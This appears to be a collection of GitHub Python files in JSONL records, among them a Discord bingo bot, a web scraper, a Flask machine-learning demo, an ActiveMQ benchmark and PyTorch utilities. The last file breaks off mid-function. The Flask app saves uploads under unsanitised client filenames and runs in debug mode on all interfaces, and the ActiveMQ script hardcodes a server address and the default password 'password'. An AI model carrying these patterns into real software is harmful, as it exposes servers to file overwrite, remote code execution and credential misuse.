\n coords, mat = create_grids(resolution, bbox_min, bbox_max)\n res_XYZ = (resolution, resolution, resolution)\n if use_octree:\n sdf = eval_grid_octree(opts, model, device, num_views, coords, eval_func, num_samples=num_sample_batch)\n else:\n raise(\"no support.\")\n \n verts, faces = mcubes.marching_cubes(sdf, 0.5)\n verts = np.matmul(mat[:3, :3], verts.T) + mat[:3, 3:4]\n verts = verts.T\n return verts, faces\n\n","repo_name":"zdlarr/SAILOR","sub_path":"utils_render/utils_render.py","file_name":"utils_render.py","file_ext":"py","file_size_in_byte":43904,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"71420336252","text":"from CardListFactory import bingoCardList\nimport ListFactory as b\nimport XMLCardList\n\nimport random\n\n\ndef bingoItemRemoved(bingoItemsRemoved):\n \"\"\"Code to run to amend cards if a bingo item is removed with the list remove or list replace command.\n bingoItemsRemoved is a list of indexes.\"\"\"\n usersChangedList = []\n\n # make a copy of the list to select the replacement bingo item from, which excludes the items already selected\n # for the card\n tempABListCtrl = b.bingoList[:]\n\n # removing the killed items from the pool of potential replacement items\n for ab in b.bingoList:\n for bi in bingoItemsRemoved:\n if bi == ab.index:\n try:\n tempABListCtrl.remove(ab)\n except:\n print(\"Could not remove item bi.\" + str(bi) + \" \" + str(ab.index))\n\n # remove the items already on a card from the pool for that card, so there aren't duplicates\n for card in bingoCardList:\n\n itemsToChangeList = []\n tempABList = tempABListCtrl[:]\n\n for selItem in card.bingoItemList:\n\n for itemRemoved in bingoItemsRemoved: # find all changed items on this card\n if itemRemoved == selItem.index:\n itemsToChangeList.append(itemRemoved)\n\n if len(itemsToChangeList) != 0: # if there are changed items on the card\n usersChangedList.append(card.userName)\n card.cardChanged = True\n\n for cardItem in card.bingoItemList:\n for ab in b.bingoList: # removing the items on the card from the pool of new items\n if ab.index == cardItem.index:\n try:\n tempABList.remove(ab)\n except:\n pass\n continue\n\n replaceList = random.sample(tempABList, len(itemsToChangeList)) # select the replacement bingoItems\n\n n = 0\n for itemToChange in itemsToChangeList: # apply changes to card\n\n for cardItem in card.bingoItemList:\n if itemToChange == cardItem.index:\n replaceIndex = card.bingoItemList.index(cardItem)\n card.bingoItemList.remove(cardItem)\n card.bingoItemList.insert(replaceIndex, replaceList[n])\n n += 1\n break\n\n if len(usersChangedList) == 0:\n usersChangedList.append(\"None\")\n else:\n XMLCardList.writeList()\n\n usersChangedString = \", \".join(usersChangedList)\n\n return usersChangedString\n","repo_name":"Kenny-Dave/Discord-BingoBot","sub_path":"ListItemRemoved.py","file_name":"ListItemRemoved.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38168256024","text":"\nLOAD_CONST = 1\nBINARY_NEQ = 2\nPRINT = 3\nBINARY_EQ = 4\nRETURN = 5\nSTORE_VARIABLE = 6\nLOAD_VARIABLE = 7\n\nJUMP = 8\nJUMP_IF_NOT_ZERO = 9\nJUMP_IF_ZERO = 10\n\nBINARY_ADD = 11\nBINARY_SUB = 12\nBINARY_LT = 13\nBINARY_LTE = 14\nBINARY_GT = 15\nBINARY_GTE = 16\nBINARY_AND = 17\nBINARY_OR = 18\nNOT = 19\nBINARY_MUL = 20\nBINARY_DIV = 21\nSTORE_ARRAY = 22\nSTORE_DICT = 23\nINDEX = 50\nCALL = 90\n\nNO_ARG = -255\n\n\nreverse = {\n 1: \"LOAD_CONST\",\n 2: \"BINARY_NEQ\",\n 3: \"PRINT\",\n 4: \"BINARY_EQ\",\n 5: \"RETURN\",\n 6: \"STORE_VARIABLE\",\n 7: \"LOAD_VARIABLE\",\n 8: \"JUMP\",\n 9: \"JUMP_IF_NOT_ZERO\",\n 10: \"JUMP_IF_ZERO\",\n 11: \"BINARY_ADD\",\n 12: \"BINARY_SUB\",\n 13: \"BINARY_LT\",\n 14: \"BINARY_LTE\",\n 15: \"BINARY_GT\",\n 16: \"BINARY_GTE\",\n 17: \"BINARY_AND\",\n 18: \"BINARY_OR\",\n 19: \"NOT\",\n 20: \"BINARY_MUL\",\n 21: \"BINARY_DIV\",\n 22: \"STORE_ARRAY\",\n 23: \"STORE_DICT\",\n 50: \"INDEX\",\n 90: \"CALL\",\n 0: \"NO_ARG\"\n}\n\nclass Bytecode(object):\n \"\"\"Also plundered from Cycy\"\"\"\n \n def __init__(self, instructions, arguments, constants, variables, name):\n self.instructions = instructions\n self.name = name\n self.arguments = arguments or []\n self.constants = constants\n self.variables = variables\n\n def __iter__(self):\n \"\"\"Yield (offset, byte_code, arg) tuples.\n The `byte_code` will be one of the constants defined above,\n and `arg` may be None. `byte_code` and `arg` will be ints.\n \"\"\"\n offset = 0\n while offset < len(self.instructions):\n byte_code, arg = self.instructions[offset]\n \n yield (offset, byte_code, arg)\n offset += 1\n\n def to_string(self):\n return 'bytecode'\n\n def dump(self, pretty=True, indent=0):\n lines = []\n lines.append(\"CONSTANTS:\")\n for i, v in enumerate(self.constants):\n lines.append(\"%s: %s\" % (i, v.to_string()))\n \n lines.append(\"VARS:\")\n for k, v in self.variables.iteritems():\n lines.append(\"%s: %s => %s\" % (k, v.name, v.value.__class__.__name__))\n \n \n lines.append(\"CODE:\")\n \n for offset, byte_code, arg in self:\n\n name = reverse[byte_code]\n\n str_arg = \"\"\n if arg != NO_ARG:\n str_arg = \"%s\" % arg\n\n line = \"%s%s %s %s\" % (' ' * indent, str(offset), name, str_arg)\n if pretty:\n if byte_code == LOAD_CONST:\n line += \" => \" + self.constants[arg].dump()\n elif byte_code == CALL:\n line += \" => \\n\" + self.variables[arg].value.dump()\n \n elif byte_code == RETURN:\n if arg:\n line += \" (top of stack)\"\n else:\n line += \" (void return)\"\n lines.append(line.strip())\n\n return \"\\n\".join(lines)\n\n","repo_name":"joshsharp/python-braid","sub_path":"bytecode.py","file_name":"bytecode.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"78"} +{"seq_id":"29779294720","text":"import urllib.request #导入urllib.request包\r\nimport requests #导入requests包.此包是用Python语言编写,基于urllib,采用Apache2 Licensed开源协议的HTTP库.它比 urllib 更加方便,可以节约我们大量的工作.\r\nfrom bs4 import BeautifulSoup\r\nimport xlwt #导入Excel包\r\nmingc=[]#建立存储网站名称的空列表\r\npaim=[]#建立存储网站周排名的空列表\r\ndefen=[]#建立存储网站得分的空列表\r\nzhqt=[]#建立存储网站周排名以及与其同节点数据的空列表\r\njies=[]#建立存储网站介绍的空列表\r\n\r\nr=requests.get('http://top.chinaz.com/hangye/index_jiaotonglvyou_lvyou.html')#获取网站('http://top.chinaz.com/hangye/index_jiaotonglvyou_lvyou.html')的源代码到r\r\nif r.status_code==200: #确保读取源代码正常\r\n r.encoding = 'utf-8'#将文本编码格式定为utf-8 ,便于读取\r\n html=r.text #将代码改为text格式存入html\r\n soup = BeautifulSoup(html,\"html.parser\")#将html用BeautifulSoup转化后存入soup\r\n #从文档中找到所有标签(网站名称)的链接: \r\n for link in soup.find_all('h3',class_=\"rightTxtHead\"):\r\n mingc.append(link.get_text())#向对应列表中添加网站名称\r\n #从文档中找到所有标签(网站周排名以及与其同节点数据)的链接: \r\n for link in soup.find_all('p',class_=\"RtCData\"):\r\n zhqt.append(link.get_text())#向对应列表中添加网站周排名以及与其同节点数据\r\n #从文档中找到所有标签(网站得分)的链接: \r\n for link in soup.find_all('div',class_=\"RtCRateCent\"):\r\n defen.append(link.get_text()[5:])#向对应列表中添加网站得分\r\n #从文档中找到所有标签(网站介绍)的链接: \r\n for link in soup.find_all('p',class_=\"RtCInfo\"):\r\n jies.append(link.get_text()[5:])#向对应列表中添加网站介绍\r\n \r\ni=0#确保列表内容从0开始转换\r\nwhile i<30:#确保转换的列表内容不为空\r\n j=i*4\r\n paim.append(zhqt[j][9:])#清除与周排名相同节点的无用数据,向周排名列表中添加周排名\r\n i=i+1#确保列表内序号依次增加\r\n \r\ni=0#确保列表内容从0开始打印\r\nwhile i<30:#确保打印列表内容不为空\r\n print()#打印换行\r\n print(i+1)#打印网站序号\r\n print(mingc[i])#打印网站名称\r\n print(\" 周排名:\"+paim[i])#打印网站周排名\r\n print(\" 网站得分:\"+defen[i])#打印网站得分\r\n print(\" 网站介绍:\"+jies[i])#打印网站介绍\r\n i=i+1#确保列表内序号依次增加\r\n \r\nexcelTabel= xlwt.Workbook()#创建excel对象\r\nsheet1=excelTabel.add_sheet('wangzhang',cell_overwrite_ok=True)#在创建的Excel表格中创建名为'wangzhang'的工作空间\r\nsheet1.write(0,0,'网站名称')#向Excel表格A1框中输入标题“网站名称”\r\nsheet1.write(0,1,'周排名')#向Excel表格B1框中输入标题“周排名”\r\nsheet1.write(0,2,'网站得分')#向Excel表格C1框中输入标题“网站得分”\r\nsheet1.write(0,3,'网站介绍')#向Excel表格D1框中输入标题“网站介绍”\r\n\r\ni=0#确保列表内容从0开始输入表格\r\nt=1#确保Excel表格中框从第二行开始\r\nwhile t<31: #确保输入Excel表格框中的列表内容不为空\r\n sheet1.write(t,0,mingc[i])#向Excel表格与A1同列的框中依次输入各网站名称\r\n sheet1.write(t,1,paim[i])#向Excel表格与B1同列的框中依次输入各网站周排名\r\n sheet1.write(t,2,defen[i])#向Excel表格与C1同列的框中依次输入各网站得分\r\n sheet1.write(t,3,jies[i])#向Excel表格与D1同列的框中依次输入各网���介绍\r\n i=i+1#确保列表内序号依次增加\r\n t=t+1#跳转Excel表行数\r\nexcelTabel.save('wangzhang.xlsx')#保存名为'wangzhang.xlsx'的Excel表格\r\n","repo_name":"siyiaoyou/pachong--","sub_path":"pachong (旅游网站爬取分析).py","file_name":"pachong (旅游网站爬取分析).py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14474706373","text":"from flask import Flask, render_template, request\nfrom flask import current_app\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\nfrom sklearn.cluster import KMeans\nfrom bp_modue.module import module_bp\nfrom datetime import datetime\nimport os, joblib\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt \n\napp = Flask(__name__)\napp.register_blueprint(module_bp, url_prefix='/module')\n\n@app.route('/')\ndef index():\n menu = {'ho':1, 'm1':0, 'm2':0, 'm3':0, 'cf':0, 'cu':0}\n return render_template('index.html', menu=menu)\n\n@app.route('/menu1', methods=['GET', 'POST'])\ndef menu1():\n menu = {'ho':0, 'm1':1, 'm2':0, 'm3':0, 'cf':0, 'cu':0}\n if request.method == 'GET':\n return render_template('menu1.html', menu=menu)\n else:\n text = request.form['text']\n review = request.form['review'].replace('\\n','
')\n lang = request.form['lang']\n return render_template('menu1_res.html', menu=menu,\n text=text, review=review, lang=lang)\n\n@app.route('/menu2')\ndef menu2():\n menu = {'ho':0, 'm1':0, 'm2':1, 'm3':0, 'cf':0, 'cu':0}\n items = [\n {'id':1001, 'title':'HTML', 'content':'HTML is HyperText ...'},\n {'id':1002, 'title':'CSS', 'content':'CSS is Cascading ...'},\n {'id':1003, 'title':'JS', 'content':'JS is Javascript ...'},\n ]\n now = datetime.now()\n np.random.seed(now.microsecond)\n X = np.random.rand(100)\n Y = np.random.rand(100)\n plt.figure()\n plt.scatter(X, Y)\n img_file = os.path.join(current_app.root_path, 'static/img/menu2.png')\n plt.savefig(img_file)\n mtime = int(os.stat(img_file).st_mtime)\n\n return render_template('menu2.html', menu=menu, mtime=mtime,\n now=now.strftime('%Y-%m-%d %H:%M:%S.%f'), items=items)\n\n@app.route('/classify', methods=['GET', 'POST'])\ndef classify():\n menu = {'ho':0, 'm1':0, 'm2':0, 'm3':0, 'cf':1, 'cu':0}\n if request.method == 'GET':\n return render_template('classify.html', menu=menu)\n else:\n index = int(request.form['index'] or '0')\n df = pd.read_csv('static/data/titanic_test.csv')\n scaler = joblib.load('static/model/titanic_scaler.pkl')\n test_data = df.iloc[index, :-1].values.reshape(1,-1)\n test_scaled = scaler.transform(test_data)\n label = df.iloc[index, 0]\n lrc = joblib.load('static/model/titanic_lr.pkl')\n svc = joblib.load('static/model/titanic_sv.pkl')\n rfc = joblib.load('static/model/titanic_rf.pkl')\n pred_lr = lrc.predict(test_scaled)\n pred_sv = svc.predict(test_scaled)\n pred_rf = rfc.predict(test_scaled)\n result = {'index':index, 'label':label,\n 'pred_lr':pred_lr[0], 'pred_sv':pred_sv[0], 'pred_rf':pred_rf[0]}\n\n tmp = df.iloc[index, 1:].values\n value_list = []\n int_index_list = [0, 1, 3, 4, 6, 7]\n for i in range(8):\n if i in int_index_list:\n value_list.append(int(tmp[i]))\n else:\n value_list.append(tmp[i])\n org = dict(zip(df.columns[1:], value_list))\n return render_template('classify_res.html', menu=menu, res=result, org=org)\n\n@app.route('/cluster', methods=['GET', 'POST'])\ndef cluster():\n menu = {'ho':0, 'm1':0, 'm2':0, 'm3':0, 'cf':0, 'cu':1}\n if request.method == 'GET':\n return render_template('cluster.html', menu=menu)\n else:\n k_number = int(request.form['k_number'])\n option = request.form['option']\n if option == 'direct':\n f_csv = request.files['csv']\n file_csv = os.path.join(current_app.root_path, 'static/upload/') + f_csv.filename\n f_csv.save(file_csv)\n print(f\"{k_number}, {f_csv}, {file_csv}\")\n else:\n file_csv = os.path.join(current_app.root_path, 'static/clus_pca_data/') + option + '.csv'\n\n df_csv = pd.read_csv(file_csv)\n # 전처리 - 정규화\n X_scaled = StandardScaler().fit_transform(df_csv.iloc[:, :-1])\n\n # 차원 축소(PCA)\n pca_array = PCA(n_components=2).fit_transform(X_scaled)\n df = pd.DataFrame(pca_array, columns=['pca_x', 'pca_y'])\n df['target'] = df_csv.iloc[:, -1].values\n\n # K-Means Clustering\n kmeans = KMeans(n_clusters=k_number, init='k-means++', max_iter=300, random_state=2022)\n kmeans.fit(X_scaled)\n df['cluster'] = kmeans.labels_\n\n # 시각화\n markers = ['s', 'o', '^', 'P', 'D', 'H', 'x']\n plt.figure()\n for i in df.target.unique():\n marker = markers[i]\n x_axis_data = df[df.target == i]['pca_x']\n y_axis_data = df[df.target == i]['pca_y']\n plt.scatter(x_axis_data, y_axis_data, marker=marker)\n plt.title('Original Data', fontsize=15)\n plt.xlabel('PCA 1'); plt.ylabel('PCA 2')\n img_file = os.path.join(current_app.root_path, 'static/img/cluster0.png')\n plt.savefig(img_file)\n\n plt.figure()\n for i in range(k_number):\n marker = markers[i]\n x_axis_data = df[df.cluster == i]['pca_x']\n y_axis_data = df[df.cluster == i]['pca_y']\n plt.scatter(x_axis_data, y_axis_data, marker=marker)\n plt.xlabel('PCA 1'); plt.ylabel('PCA 2')\n plt.title(f'{k_number} Clustering Result', fontsize=15)\n img_file = os.path.join(current_app.root_path, 'static/img/cluster1.png')\n plt.savefig(img_file)\n\n mtime = int(os.stat(img_file).st_mtime)\n return render_template('cluster_res.html', menu=menu, k_number=k_number, mtime=mtime)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)\n","repo_name":"Jinimo/Flask_web_","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72055858171","text":"from sklearn.metrics import auc, roc_curve\nimport numpy as np\nimport torch\n\ndef auc_acc(pred, true):\n sigma = 1e-6\n true = true.astype(int)\n pred = pred + np.random.rand(*pred.shape) * sigma\n auc_list = []\n if pred.shape[0] != true.shape[0]:\n for iter1 in range(pred.shape[0]):\n id = pred[iter1].argsort()\n for iter2 in range(true.shape[0]):\n fpr, tpr, thresholds = roc_curve(true[iter2][id], pred[iter1][id], pos_label=1)\n auc_list.append(auc(fpr, tpr))\n else:\n for iter1 in range(pred.shape[0]):\n id = pred[iter1].argsort()\n fpr, tpr, thresholds = roc_curve(true[iter1][id], pred[iter1][id], pos_label=1)\n auc_list.append(auc(fpr, tpr))\n return np.mean(np.array(auc_list))\n\n\ndef KL_Divengence(P, Q, multi_state=False, log=torch.log2):\n if multi_state:\n P /= P.sum(-1, keepdims=True)\n Q /= Q.sum(-1, keepdims=True)\n out = (P * (log(P) - log(Q))).sum(-1)\n else:\n out = P * (log(P) - log(Q)) + (1 - P) * (log(1 - P) - log(1 - Q))\n return out\n\ndef JS_Divengence(P, Q, multi_state=False):\n M = (P + Q) / 2\n return (KL_Divengence(P, M, multi_state=False) + KL_Divengence(Q, M, multi_state=False)) / 2\n\n\ndef CrossEntropy(pred, true, multi_state=True, sigma=1e-8):\n assert((pred.max() <= 1) and (pred.min() >= 0))\n assert((true.max() <= 1) and (true.min() >= 0))\n true = true.clamp(sigma, 1-sigma)\n pred = pred.clamp(sigma, 1-sigma)\n if not multi_state:\n return (- true * torch.log(pred) - (1 - true) * torch.log(1 - pred))\n else:\n return (- true * torch.log(pred)).sum(-1)\n\n\ndef EffectiveInformation(\n pred, true, multi_state=False, sigma=1e-10, dtype=None): # input: [number of samples, number of vertices]\n \n assert((pred.max() <= 1) and (pred.min() >= 0))\n assert((true.max() <= 1) and (true.min() >= 0))\n pred = pred.float().clamp(sigma, 1-sigma)\n true = true.float().clamp(sigma, 1-sigma)\n \n if multi_state:\n mean = true.clone()\n for iter in range(len(true.shape)-1):\n mean = mean.mean(iter, keepdims=True)\n temp1, temp2 = KL_Divengence(mean, true, multi_state=True).mean(), KL_Divengence(pred, true, multi_state=True).mean()\n else:\n mean = true * 0.0 + true.mean()\n #pred /= pred.sum(-1, keepdim=True)\n #true /= true.sum(-1, keepdim=True)\n #mean /= mean.sum(-1, keepdim=True)\n temp1, temp2 = KL_Divengence(mean, true, multi_state=False).mean(), KL_Divengence(pred, true, multi_state=False).mean()\n #print(temp1)\n #print(temp2)\n if dtype:\n temp1, temp2 = dtype(temp1), dtype(temp2)\n return temp1, temp2, temp1 - temp2 # [Mean:True, Pred:True, Mean:True-Pred:True]\n\ndef CorrelationCoefficient(pred, true, dtype=None, sigma=1e-12):\n x = pred.float()\n y = true.float()\n\n vx = x - x.mean(dim=-1, keepdims=True)\n vy = y - y.mean(dim=-1, keepdims=True)\n\n corr = torch.sum(vx * vy, dim=-1, keepdims=True) / ((torch.sqrt(torch.sum(vx ** 2, dim=-1, keepdims=True)) * torch.sqrt(torch.sum(vy ** 2, dim=-1, keepdims=True))) + sigma)\n return corr","repo_name":"tsinghua-fib-lab/MSDNet","sub_path":"generate_dataset/simulate_illness_spread/util/Criteria.py","file_name":"Criteria.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71021493373","text":"# f = c * 1.8 + 32\r\n\r\nimport tkinter as tk\r\n\r\npencere = tk.Tk()\r\npencere.title(\"🌡️Sıcaklık Dönüşümü(C/F)♨️☀️\")\r\npencere.geometry(\"330x250+650+250\")\r\npencere.config(bg=\"#666666\")\r\npencere.resizable(False,False)\r\n\r\npencere_icon = tk.PhotoImage(file=\"images/sicaklikTermometre.png\")\r\npencere.iconphoto(False,pencere_icon)\r\n\r\ndef pencereyi_kapat():\r\n pencere.destroy()\r\n\r\ndef cevir():\r\n \r\n c = int(e1.get())\r\n f = c * 1.8 + 32\r\n label4.config(text=f)\r\n e1.delete(0,\"end\")\r\n\r\nlabel1 = tk.Label(pencere,\r\n text=\"Sıcaklık Dönüşümü\",\r\n fg=\"white\",\r\n bg=\"black\",\r\n font=(\"Arial 15 bold\")\r\n )\r\nlabel1.pack()\r\n\r\nlabel2 = tk.Label(pencere,\r\n text=\"Sıcaklık Değerini Giriniz(C): \",\r\n fg=\"white\",\r\n bg=\"#666666\",\r\n font=(\"Arial 15 bold\")\r\n )\r\nlabel2.pack()\r\n\r\ne1 = tk.Entry(pencere,\r\n font=(\"arial 15\"),\r\n fg=\"red\",\r\n bg=\"cyan\")\r\ne1.pack()\r\ne1.focus()\r\n\r\ncevir_buton = tk.Button(pencere,\r\n text=\"Çevir(C/F)\",\r\n font=(\"arial 10\"),\r\n fg=\"white\",\r\n bg=\"#666666\",\r\n width=10,\r\n command=cevir)\r\ncevir_buton.pack(pady=5)\r\n\r\nlabel3 = tk.Label(pencere,\r\n text=\"Sıcaklık Değeri(F)\",\r\n font=(\"arial 10 bold\"),\r\n fg=\"white\",\r\n bg=\"#666666\")\r\nlabel3.pack()\r\n\r\nlabel4 = tk.Label(pencere,\r\n text=\"...........\",\r\n font=(\"arial 10 bold\"),\r\n fg=\"lime\",\r\n bg=\"#666666\")\r\nlabel4.pack()\r\n\r\nkapat_buton = tk.Button(pencere,\r\n text=\"Kapat\",\r\n font=(\"arial 10\"),\r\n fg=\"white\",\r\n bg=\"#666666\",\r\n width=10,\r\n command=pencereyi_kapat)\r\nkapat_buton.pack(pady=5)\r\npencere.mainloop()","repo_name":"erhan3861/python_tkinter_projects","sub_path":"sicaklikcevirici1.py","file_name":"sicaklikcevirici1.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24738998622","text":"import numpy as np\nimport scipy.stats\nimport pickle\nimport zlib\nimport os\nimport time # processing performance\nimport pyarrow.parquet as pq # read parquet\nfrom tqdm import tqdm\nimport stomp\n\n\n# Loop through generator obj 제너레이터 반복을 통한 기술 통계량 계산\ndef slice_generator(time_range):\n list = range(time_range) # 범위만 담고 있음\n for y in tqdm(list): # 범위 만큼 반복\n yield y # 반복 할 것 반환\n\n\n# 기술 통계 계산\ndef statistic_calc(batch_df):\n statistic = batch_df.groupby('100ms').agg(\n [np.mean, min, max, np.median, np.var, scipy.stats.skew, scipy.stats.kurtosis])\n statistic = statistic.stack(level=0).reset_index() # 건희는 이게 편해, 채널이 column 으로\n return statistic\n\n\n# 전송 방법에 따른 함수 구현\ndef json_pub(df):\n res = df.to_json(orient='records', double_precision=15)\n return res\n\n\ndef byte_pub(df):\n res = zlib.compress(pickle.dumps(df))\n return res\n\n\ndef zlib_pub(df):\n res = zlib.compress(df.to_json(orient='records', double_precision=15))\n return res\n\n\ndef pickle_pub(df):\n res = pickle.dumps(df)\n return res\n\n\n# 실험 변수\nparquet_file_path = \"../dataset.parquet\"\n\n# active MQ 서버 정보 선언\nuser = os.getenv(\"ACTIVEMQ_USER\") or \"admin\"\npassword = os.getenv(\"ACTIVEMQ_PASSWORD\") or \"password\"\nhost = os.getenv(\"ACTIVEMQ_HOST\") or \"114.70.212.154\"\nport = os.getenv(\"ACTIVEMQ_PORT\") or 61613\ndestination = \"/topic/parquet\" # 토픽 세팅\n\n# make connection to activeMQ Server\nconn = stomp.Connection(host_and_ports=[(host, port)])\nconn.connect(login=user, passcode=password)\n\n# DataFrame 형태로 변환\ntable = pq.read_table(parquet_file_path)\ndataset = table.to_pandas()\n\n# 기술 통계량 계산 시 그룹화 시킬 millisecond 열 추가\ndataset[\"100ms\"] = (dataset[\"Timestamp\"]*10).apply(int) # 기숱롱계량 구하기 위함\ndataset = dataset.drop(\"Timestamp\", axis=1)\n\n# 전송: 본 데이터(100ms 열을 바탕으로 0.1초 분량씩 전송)\n# * 100ms 배치의 총 개수 계산 후 그만큼 반복하는 제너레이터 생성\ndf_start_sec = dataset.loc[0, ['100ms']][0]//10\ndf_end_sec = dataset.loc[len(dataset) - 1, ['100ms']][0]//10\ngeneratorObj = slice_generator(int(df_end_sec - df_start_sec))\n\n# 500 초짜리 기술통계 데이터 만들기\nstatistic_df_ls = []\nfor i in generatorObj:\n calc = statistic_calc(dataset.loc[dataset['100ms'] // 10 == df_start_sec + i])\n statistic_df_ls.append(calc)\n statistic_df_ls.append(calc)\n statistic_df_ls.append(calc)\n statistic_df_ls.append(calc)\n statistic_df_ls.append(calc)\n\nprint(len(statistic_df_ls))\n\n# 시작 입력\ninput(\"반드시 subscriber 먼저 실행시켜주세요 > 확인:엔터\")\n\n# 시간 측정\nstart = time.time() # 시간 측정\n\n# 1초 데이터마다 보내기. 기술 통계량은 0.1초마다 구함\nfor i in range(len(statistic_df_ls)):\n # Serialize and Publish\n transferSlice = json_pub(statistic_df_ls[i])\n conn.send(destination, transferSlice, persistent='false')\n\n# 닫기, 시간 측정 마무리\nconn.send(destination, \"SHUTDOWN\", persistent='true')\nprint(\" endtime:\", time.time() - start)\nconn.disconnect()\n","repo_name":"passionleader/Message-Queue-Performance-test","sub_path":"Publisher(client-side)/stat_pub_and_timechk_activemq.py","file_name":"stat_pub_and_timechk_activemq.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7751578614","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torchvision\nimport torch.nn.functional as F\nfrom sklearn.neighbors import kneighbors_graph\nimport sklearn\nimport numpy as np\nimport scipy.sparse as sp\nimport scipy\nimport math\nfrom torch.nn.parameter import Parameter\n\n\n# https://github.com/shelhamer/fcn.berkeleyvision.org/blob/master/surgery.py\ndef get_upsampling_weight(in_channels, out_channels, kernel_size):\n \"\"\"Make a 2D bilinear kernel suitable for upsampling\"\"\"\n factor = (kernel_size + 1) // 2\n if kernel_size % 2 == 1:\n center = factor - 1\n else:\n center = factor - 0.5\n og = np.ogrid[:kernel_size, :kernel_size]\n filt = (1 - abs(og[0] - center) / factor) * \\\n (1 - abs(og[1] - center) / factor)\n weight = np.zeros((in_channels, out_channels, kernel_size, kernel_size),\n dtype=np.float64)\n weight[range(in_channels), range(out_channels), :, :] = filt\n return torch.from_numpy(weight).float()\n\n\ndef freeze(m):\n for p in m.parameters():\n p.requires_grad = False\n\nclass _NonLocalBlockND(nn.Module):\n def __init__(self, in_channels, inter_channels=None, dimension=2, sub_sample=True, bn_layer=True):\n super(_NonLocalBlockND, self).__init__()\n\n self.sub_sample = sub_sample\n\n self.in_channels = in_channels\n self.inter_channels = inter_channels\n\n if self.inter_channels is None:\n self.inter_channels = in_channels // 2\n if self.inter_channels == 0:\n self.inter_channels = 1\n\n conv_nd = nn.Conv2d\n max_pool_layer = nn.MaxPool2d(kernel_size=(2, 2))\n bn = nn.BatchNorm2d\n\n self.g = conv_nd(in_channels=self.in_channels, out_channels=self.inter_channels,\n kernel_size=1, stride=1, padding=0)\n\n if bn_layer:\n self.W = nn.Sequential(\n conv_nd(in_channels=self.inter_channels, out_channels=self.in_channels,\n kernel_size=1, stride=1, padding=0),\n bn(self.in_channels)\n )\n nn.init.constant_(self.W[1].weight, 0)\n nn.init.constant_(self.W[1].bias, 0)\n else:\n self.W = conv_nd(in_channels=self.inter_channels, out_channels=self.in_channels,\n kernel_size=1, stride=1, padding=0)\n # nn.init.constant_(self.W.weight, 0)\n # nn.init.constant_(self.W.bias, 0)\n\n self.theta = conv_nd(in_channels=self.in_channels, out_channels=self.inter_channels,\n kernel_size=1, stride=1, padding=0)\n self.phi = conv_nd(in_channels=self.in_channels, out_channels=self.inter_channels,\n kernel_size=1, stride=1, padding=0)\n\n if sub_sample:\n self.g = nn.Sequential(self.g, max_pool_layer)\n self.phi = nn.Sequential(self.phi, max_pool_layer)\n\n def forward(self, x):\n '''\n :param x: (b, c, t, h, w)\n :return:\n '''\n\n batch_size = x.size(0)\n\n g_x = self.g(x).view(batch_size, self.inter_channels, -1)\n g_x = g_x.permute(0, 2, 1)\n\n theta_x = self.theta(x).view(batch_size, self.inter_channels, -1)\n theta_x = theta_x.permute(0, 2, 1)\n phi_x = self.phi(x).view(batch_size, self.inter_channels, -1)\n f = torch.matmul(theta_x, phi_x)\n f_div_C = F.softmax(f, dim=-1)\n\n y = torch.matmul(f_div_C, g_x)\n y = y.permute(0, 2, 1).contiguous()\n y = y.view(batch_size, self.inter_channels, *x.size()[2:])\n W_y = self.W(y)\n z = W_y + x\n\n return z\n\ndef grid(h, w, dtype=np.float32):\n \"\"\"Return the embedding of a grid graph.\"\"\"\n M = h * w\n x = np.linspace(0, 1, w, dtype=dtype)\n y = np.linspace(0, 1, h, dtype=dtype)\n xx, yy = np.meshgrid(x, y)\n z = np.empty((M, 2), dtype)\n z[:, 0] = xx.reshape(M)\n z[:, 1] = yy.reshape(M)\n return z\n\ndef distance_sklearn_metrics(z, k=4, metric='euclidean'):\n \"\"\"Compute exact pairwise distances.\"\"\"\n # d = sklearn.metrics.pairwise.pairwise_distances(\n # z, metric=metric, n_jobs=-2)\n # d = scipy.spatial.distance.pdist(z, 'euclidean')\n # d = scipy.spatial.distance.squareform(d)\n\n z = torch.from_numpy(z).cuda()\n r = torch.mm(z, z.permute(1, 0))\n N = r.size()[0]\n HW = r.size()[1]\n\n diag = r.diag().unsqueeze(0)\n diag = diag.expand_as(r)\n # compute the distance matrix\n D = (diag + diag.t() - 2 * r).sqrt()\n topk, indices = torch.topk(D, k=k + 1, largest=False)\n del D\n del diag\n del r\n\n return topk[:, 1:], indices[:, 1:]\n # k-NN graph.\n # idx = np.argsort(d)[:, 1:k+1]\n # d.sort()\n # d = d[:, 1:k+1]\n # return d, idx\n\ndef adjacency(dist, idx):\n \"\"\"Return the adjacency matrix of a kNN graph.\"\"\"\n M, k = dist.size()\n # assert M, k == idx.shape\n # assert dist.min() >= 0\n\n # Weights.\n sigma2 = torch.mean(dist[:, -1])**2\n dist = torch.exp(- dist**2 / sigma2)\n\n # Weight matrix.\n I = torch.arange(0, M).repeat_interleave(k).contiguous().view(1, -1).cuda()\n J = idx.contiguous().view(1, -1)\n V = dist.contiguous().view(-1)\n indices = torch.cat([I, J], dim=0)\n W = torch.sparse.FloatTensor(indices, V, torch.Size([M, M])).cuda()\n # W = scipy.sparse.coo_matrix((V.cpu().numpy(), (I.cpu().numpy(), J.cpu().numpy())), shape=(M, M))\n\n # No self-connections.\n # 